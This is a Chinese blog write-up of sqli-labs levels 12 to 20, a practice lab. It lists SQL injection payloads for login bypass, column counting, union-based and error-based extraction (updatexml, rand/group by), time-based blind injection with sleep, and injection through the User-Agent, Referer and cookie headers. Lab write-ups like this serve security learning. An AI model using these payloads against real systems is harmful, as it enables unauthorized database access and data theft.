less12-less20()

最新推荐文章于 2024-10-09 22:05:20 发布
最新推荐文章于 2024-10-09 22:05:20 发布
阅读量4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: sqli-labs记录 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36567469/article/details/123617601
本文详细介绍了多种SQL注入攻击手法,包括user_agent、referer和cookie注入,展示了利用注入漏洞获取数据库信息的过程。同时,列举了不同类型的注入语句,如order by、union select和错误报错注入等,用于探测数据库结构和版本信息。针对无回显场景,提出了报错注入的解决策略。文章还提醒读者关注SQL注入的防范措施,确保系统安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

总结

user_agent注入
referer注入
cookie注入
updatexml()报错注入

less12

用户名密码输入

a") or ("1"="1

得到一个账户Dumb、Dumb。
用户名密码处分别输入计算出行数

Dumb") and ("1"="1
Dumb") and 1=1 order by 2--

输入

Dumb") and ("1"="2
Dumb") and 1=2 union select 1,2--

输入

Dumb") and ("1"="2
Dumb") and 1=2 union select @@version,2--

less13

因为页面无回显,所以采用报错注入。

  1. 用户名密码输入
7') or ('1')=('1
7') or 1=1 order by 2-- 

7') or ('1')=('1
7') or 1=1 union select concat(left(rand(),3),'>',@@version),count(*) from information_schema.tables group by 1-- `

less14

双引号
1.

7" or "1"="1
7" or 1=1 order by 2-- 

7" or "1"="1
7" or 1=1 union select concat(left(rand(),3),'>',@@version),count(*) from information_schema.tables group by 1--

less15

123
1' or 1=1 and sleep(5)--

2.得到数据库长度

//用户名处输入任意数
1' or 1=1 and if(length(database())>1,sleep(5),1)--

less16

1") or 1=1 order by 2-- 

1") or length(database())>0--

less17()

Dumb
Dumb' and updatexml(1,concat('>',database(),'>'),1)--

less18()

user_agent注入

' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

在这里插入图片描述

less19##

referer注入

 ' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

在这里插入图片描述

less20

cookie注入

uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#

在这里插入图片描述

SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十关,sqllabs less-20,sqli-labs less20
sqli-labs Less-20(cookie注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 422
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
Less-20
m0_62094846的博客
03-31 866
只能用cookie传参,如果用POST传参,就会提示用cookie,无论cookie中输入什么都是这样 uname=1'# uname=1' order by 3# uname=1' order by 2# 都不会有任何回显,但是4就会报错,也只会报错 但是select的时候又直接回显了,不知道为什么order by 1和2的时候不报错 uname=1' union select 1,2,3# 所以按照正常的查就可以了 uname=1' union select d...
less12 函数
weixin_34301132的博客
06-13 151
less .x(1) { x:11 } .x(2) { y:22 } .x(@x:1) when (default()) {z:@x} //default()表示一直为真 body{ background: color("#f60"); width: convert(1s,ms); background: data-uri('arr.jpg'); } .div1{ .x(1...
Less-12
m0_62094846的博客
12-26 230
双引号会报错,后面要加) 判断列数 有2列 判断回显位 (1)查库名 (2)查表名 (3)查列名 (4)查数据
sqli————Less-12
Fly_鹏程万里
05-11 710
Less-12源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Less 20 (cookie注入)
老司机开代码的博客
08-03 432
文章目录1. 题目分析2. 思路3. 注入手法3.1 更改本地cookie3.2 抓包更改cookie 1. 题目分析 首页是一个登录框,登录成功后,可以看到如下界面: 这里记录了很多请求头信息。接着看一下网站源码: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="ht
sqli-labs (less-20)
kukudeshuo的博客
03-11 376
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
sqli-labs(less-20)
m0_64849639的博客
08-06 687
sqli-labs(less-20)
Linux命令之less(12)
xuforeverlove的博客
10-28 501
Linux命令之less
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 462
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
SQLi-LABS Less-11&&Less-12
m0_64898960的博客
04-20 921
Less-11题目 使用bp抓包进行观察,得知这是POST注入 进行测试 猜字段数 获显示位 查数据库名 查表名 查列名 查列里面的内容 Less-12题目 Less-12具体做法和Less-11一样只不过闭合的姿势不一样而已 由bp抓包得知Less-12闭合的姿势是“ ") ” 然后按上面的步骤就好。 总结 从这里开始已经进入POST注入的专题 POST注入与GET注入 GET方式是在客户端通过URL提交数据,数据在URL中可以看到 POST方式的数据则放置在HTML HEADE
SQLI-LABS Less-20Less-22
Web学习之路
03-24 201
Cookie注入
Sqli-labs之Less-20Less-21和Less-22
→_→
04-15 3742
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-labs (less20-less22)
Xi4or0uji
08-01 1050
less 20 cookie注入 这关首先看源码可以看见首次登录,后台会把username放去cookie,再次登录的时候,如果cookie没过期,就会去cookie里面取值,然后进行查询,至于sql语句就是 所以我们只要去改掉他的cookie就可以拿到数据库的东西了 最后改出来是上面那个,为什么这样写呢,sql查询语句如果前面为空,就会将后面查出来的信息给出来 因为源码后面是将...
UploadLabs Less12-21
qq_45785324的博客
07-29 1001
uploadlabs less12-21通关攻略
SQLI-LABS Less-11 到 Less-12
Web学习之路
03-22 371
联合注入
sqli-labs less-20 less-21 less-22 cookie注入
最新发布
wanggonghanfei的博客
10-09 1567
使用post注入对sqli-labs less-20 less-21 less-22 进行注入的经验分享
SQLi-labs(Less-20Less-21、Less-22)
weixin_41182861的博客
08-01 271
Less-20 POST - Cookie injections - Uagent field -error based 基于错误的cookie请求头注入。 首先我们要了解一下cookie的作用,cookie是非常重要的请求头,它是一段文本,常用来表示请求者身份等。通过下面的源代码能够了解到,输入正确用户名和密码登陆后,服务器会将用户名和密码记录在cookie中。那么这样的作用就是下一次客户端只要提交cookie就能登陆。 首先登陆,通过抓包获得cookie: 第一个包 第二个包 以
less-plugin-autoprefix 插件:自动化 CSS 前缀处理
资源摘要信息:"less-plugin-autoprefix是一个Less插件,其作用是将Autoprefixer集成进Less的编译过程中,为CSS属性自动添加浏览器特定的前缀。该插件能大大简化开发者在编写Less代码时对CSS前缀的管理,确保生成的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值